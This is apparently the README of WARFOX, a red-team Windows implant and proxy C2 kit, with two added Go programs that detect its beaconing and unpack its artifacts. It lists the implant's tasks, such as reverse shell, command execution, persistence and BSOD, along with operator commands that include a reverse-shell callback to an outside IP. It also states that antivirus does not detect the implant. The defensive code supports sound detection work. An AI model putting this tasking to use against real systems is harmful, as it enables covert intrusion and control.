A proof-of-concept HTTPS beaconing Windows implant and multi-layered proxy C2 network designed for covert APT emulation engagements
WARFOX is a software-based HTTPS beaconing Windows implant that uses a multi-layered proxy network for C2 communications. The kit was designed to emulate covert APT offensive operations and includes WARFOX (Windows implant), HIGHTOWER (Listening Post), and other tools to build configs and set up a proxy network.
LIGHTBEAM TCP traffic redirectors can be daisy-chained together to form a multi-layered proxy node network that masks traffic between a host running WARFOX and HIGHTOWER. LIGHTBEAM relies on socat for traffic redirection and runs on Linux hosts.
HIGHTOWER relies on two designated HTTPS endpoints to process beaconing check-ins and task command results; hosts are identified by the `id` field of the beaconing packet. WARFOX beaconing and tasking responses were designed to evade common network detection techniques.

Beaconing Engine: check-ins are sent to the `/update` HIGHTOWER endpoint.

Tasking Engine: task output is placed in a `task_response` JSON object which is exfiltrated to the `/finish` HIGHTOWER endpoint.

Networking Engine:

Protected Configuration:
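The split between a check-in endpoint and a result endpoint gives a network defender something concrete to look for: a client that POSTs to one path at a steady cadence and, shortly after some of those check-ins, to a second path. The Go program below is an added example and not part of the WARFOX/HIGHTOWER kit. It parses constructed proxy log lines (the log format, addresses and timings are made up for the example), groups check-in POSTs per client/server pair, and reports pairs whose inter-request timing has a low coefficient of variation. Only the `/update` and `/finish` paths come from this page; the log layout, thresholds and function names are assumptions. Since the page states that WARFOX beaconing was designed to evade common network detection, a real beacon may add jitter, so timing regularity is one signal to combine with others (the endpoint pair, the blank certificate fields `!sslgen` produces), not a verdict on its own.

```go
package main

import (
	"bufio"
	"fmt"
	"math"
	"net/url"
	"sort"
	"strings"
	"time"
)

// Constructed sample proxy log (timestamp, client IP, method, URL, status).
// Hosts, addresses and timings are made up for this example.
const sampleLog = `2024-05-01T10:00:00Z 10.0.0.5 POST https://203.0.113.10/update 200
2024-05-01T10:00:03Z 10.0.0.7 GET https://example.com/index.html 200
2024-05-01T10:01:00Z 10.0.0.5 POST https://203.0.113.10/update 200
2024-05-01T10:01:01Z 10.0.0.5 POST https://203.0.113.10/finish 200
2024-05-01T10:02:01Z 10.0.0.5 POST https://203.0.113.10/update 200
2024-05-01T10:02:30Z 10.0.0.7 GET https://example.com/news 200
2024-05-01T10:03:00Z 10.0.0.5 POST https://203.0.113.10/update 200
2024-05-01T10:04:00Z 10.0.0.5 POST https://203.0.113.10/update 200
2024-05-01T10:31:00Z 10.0.0.7 GET https://example.com/ 200`

type request struct {
	ts                         time.Time
	client, method, host, path string
}

// finding describes one client/server pair whose check-in timing looks regular.
type finding struct {
	Client, Host string
	Checkins     int
	MeanInterval float64 // seconds between consecutive check-ins
	CV           float64 // std dev / mean of those intervals; low means regular
	ResultPosts  int     // POSTs to the result path from the same pair
}

func parseLine(line string) (request, error) {
	f := strings.Fields(line)
	if len(f) != 5 {
		return request{}, fmt.Errorf("malformed line: %q", line)
	}
	ts, err := time.Parse(time.RFC3339, f[0])
	if err != nil {
		return request{}, err
	}
	u, err := url.Parse(f[3])
	if err != nil {
		return request{}, err
	}
	return request{ts: ts, client: f[1], method: f[2], host: u.Host, path: u.Path}, nil
}

// intervalStats returns the mean and coefficient of variation of the gaps
// between consecutive timestamps (sorted, at least two of them).
func intervalStats(times []time.Time) (mean, cv float64) {
	n := len(times) - 1
	gaps := make([]float64, n)
	for i := range gaps {
		gaps[i] = times[i+1].Sub(times[i]).Seconds()
		mean += gaps[i]
	}
	mean /= float64(n)
	if mean == 0 {
		return 0, math.Inf(1)
	}
	var variance float64
	for _, g := range gaps {
		variance += (g - mean) * (g - mean)
	}
	return mean, math.Sqrt(variance/float64(n)) / mean
}

// beaconCandidates groups POSTs to checkinPath by (client, host) and reports
// pairs with at least minCheckins requests whose timing CV is at most maxCV.
func beaconCandidates(logText, checkinPath, resultPath string, minCheckins int, maxCV float64) []finding {
	type pair struct{ client, host string }
	checkins := map[pair][]time.Time{}
	results := map[pair]int{}
	sc := bufio.NewScanner(strings.NewReader(logText))
	for sc.Scan() {
		r, err := parseLine(sc.Text())
		if err != nil || r.method != "POST" {
			continue // a production parser would count malformed lines
		}
		p := pair{r.client, r.host}
		switch r.path {
		case checkinPath:
			checkins[p] = append(checkins[p], r.ts)
		case resultPath:
			results[p]++
		}
	}
	var out []finding
	for p, times := range checkins {
		if len(times) < 2 || len(times) < minCheckins {
			continue
		}
		sort.Slice(times, func(i, j int) bool { return times[i].Before(times[j]) })
		mean, cv := intervalStats(times)
		if cv > maxCV {
			continue
		}
		out = append(out, finding{p.client, p.host, len(times), mean, cv, results[p]})
	}
	sort.Slice(out, func(i, j int) bool { return out[i].CV < out[j].CV })
	return out
}

func main() {
	for _, f := range beaconCandidates(sampleLog, "/update", "/finish", 4, 0.2) {
		fmt.Printf("%s -> %s: %d check-ins every %.0fs (CV %.3f), %d result posts\n",
			f.Client, f.Host, f.Checkins, f.MeanInterval, f.CV, f.ResultPosts)
	}
}
```

On the constructed log the only pair reported is 10.0.0.5 to 203.0.113.10, with five check-ins about 60 seconds apart and one result post; the browsing host 10.0.0.7 never reaches the threshold. The check-in and result paths are parameters so the same routine can be pointed at other endpoint pairs.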
The WARFOX implant supports 12 operator-provided tasks. The following table provides an overview of the task categories. Tasks in the `Interaction` category require an additional argument to carry out the relevant operation; consult the usage section for examples.
Task Command | Description | Category |
---|---|---|
get_processes | List the running processes using NtQuerySystemInformation | Information Gathering |
get_drivers | List the running drivers using NtQuerySystemInformation | Information Gathering |
get_users | List information about the users on the system | Information Gathering |
get_clipboard | Get a copy of clipboard contents | Information Gathering |
find_files | Locate files by a specific extension in a directory | Interaction |
del_file | Delete a file | Interaction |
kill_pid | Kill a process by its PID | Interaction |
rev_shell | Spawn an interactive shell | Interaction |
exec_command | Execute a system command | Execution |
bsod | BSOD the system | Other |
reg_persist | Persist via the Registry using the RunOnce key | Other |
uninstall | Uninstall and remove traces of artifacts on the remote system | Other |
WARFOX relies on a few third-party libraries, which makes it susceptible to detection based on known code patterns or signatures. While these libraries made development easier, a future goal is to implement everything from scratch.
According to VirusTotal, the compiled WARFOX implant is currently undetected by all antivirus products.
HIGHTOWER is a Python-based HTTP server that supports WARFOX infections; it relies on the `http.server` Python module. HIGHTOWER is unique in that it mimics a legitimate IIS web server.
- `!help` displays the help menu, which provides an overview of how to configure the server for the first time and which tasks you can issue to WARFOX.
- `!settings` displays the current server settings. You are required to set a listening port with `!listen` before issuing tasks.
- `!listen` takes a port to listen on; after executing this command, the SRVPORT setting is populated.
- `!issue` issues new tasks to hosts that beacon to HIGHTOWER once a listening port is set. Certain tasks such as `rev_shell` require additional data; the technical documentation PDF lists which commands require data.
- `!sslgen` generates a new certificate for enabling SSL/HTTPS; the generated certificate includes blank field values.
```
!issue find_files c:\users\maxim\documents\*
!issue del_file c:\users\maxim\documents\test.docx
!issue kill_pid 5597
!issue exec_command calc.exe
!issue rev_shell 192.168.55.103:4443
```
LIGHTBEAM is a Bash-based TCP traffic redirector that can be used to mask traffic between WARFOX and HIGHTOWER.
To configure LIGHTBEAM you need to set the following variables:
- `LOCAL_LISTENING_PORT` is the local port that receives inbound TCP traffic from WARFOX
- `C2_SERVER_IP` is the IP address of the remote server to redirect traffic to
- `C2_SERVER_PORT` is the port that the layer 2 remote server is listening on
PEGUARD has a dedicated GitHub repository. This utility compresses files with GZIP and encrypts them with AES-128 in CBC mode; the AES key is randomly generated and appended to the packed file.
FILEGUARD takes a file as input, compresses it via GZIP, encrypts it using AES-128 (CBC mode) and appends the AES key to the end of the file. This utility was designed to pack the WARFOX DLL implant to aid in its DLL sideloading execution process. The AES key is currently `ffffffffffffffff` to make the key parsing process of the dropper utility easier, but it could be randomized.
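For an incident responder who recovers a packed artifact, the layout described above (GZIP, then AES-128-CBC, with the 16-byte key appended to the end of the file) is enough to write a recovery routine, and the static key is itself a simple signature for the packer's default configuration. The Go program below is an added example, not FILEGUARD's own code. It assumes details the page does not give: that a 16-byte IV precedes the ciphertext and that PKCS#7 padding is used; adjust the layout if a real sample differs. `unpackArtifact` reads the trailing key, decrypts and decompresses; `usesStaticKey` is a triage check for the `ffffffffffffffff` key the page mentions; `buildSample` exists only to construct an in-memory fixture so the example runs offline. All function names are assumptions.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
)

// Assumed layout (not fully documented on the page):
//   [IV 16 bytes][AES-128-CBC ciphertext][key 16 bytes]
const keyLen = 16

// staticKey is the default key the page describes; 16 ASCII bytes, so a
// valid AES-128 key. Its presence at the end of a file is a cheap triage check.
const staticKey = "ffffffffffffffff"

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("bad plaintext length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("bad padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding")
		}
	}
	return b[:len(b)-n], nil
}

// usesStaticKey reports whether the artifact ends with the documented default key.
func usesStaticKey(packed []byte) bool {
	return len(packed) >= keyLen && string(packed[len(packed)-keyLen:]) == staticKey
}

// unpackArtifact recovers the original file: split off the trailing key,
// decrypt with AES-128-CBC (assumed leading IV, PKCS#7), then gunzip.
func unpackArtifact(packed []byte) ([]byte, error) {
	if len(packed) < keyLen+2*aes.BlockSize {
		return nil, errors.New("artifact too short for assumed layout")
	}
	key := packed[len(packed)-keyLen:]
	body := packed[:len(packed)-keyLen]
	iv, ct := body[:aes.BlockSize], body[aes.BlockSize:]
	if len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext not block-aligned")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	if pt, err = pkcs7Unpad(pt); err != nil {
		return nil, err
	}
	zr, err := gzip.NewReader(bytes.NewReader(pt))
	if err != nil {
		return nil, err
	}
	defer zr.Close()
	return io.ReadAll(zr)
}

// buildSample is a constructed test fixture: it produces an artifact in the
// assumed layout so unpackArtifact can be exercised without a real sample.
func buildSample(plain, key []byte) ([]byte, error) {
	var zbuf bytes.Buffer
	zw := gzip.NewWriter(&zbuf)
	if _, err := zw.Write(plain); err != nil {
		return nil, err
	}
	if err := zw.Close(); err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return nil, err
	}
	padded := pkcs7Pad(zbuf.Bytes())
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return append(append(iv, ct...), key...), nil
}

func main() {
	sample := []byte("constructed stand-in for a packed file's contents")
	packed, err := buildSample(sample, []byte(staticKey))
	if err != nil {
		panic(err)
	}
	got, err := unpackArtifact(packed)
	fmt.Println("static key present:", usesStaticKey(packed), "| recovered:", err == nil && bytes.Equal(got, sample))
}
```

`unpackArtifact` rejects truncated or misaligned input before touching the cipher, and a wrong key surfaces as a padding or gzip header error rather than garbage output. If a sample was packed with a randomized key, `usesStaticKey` returns false but recovery still works, since the key travels with the file.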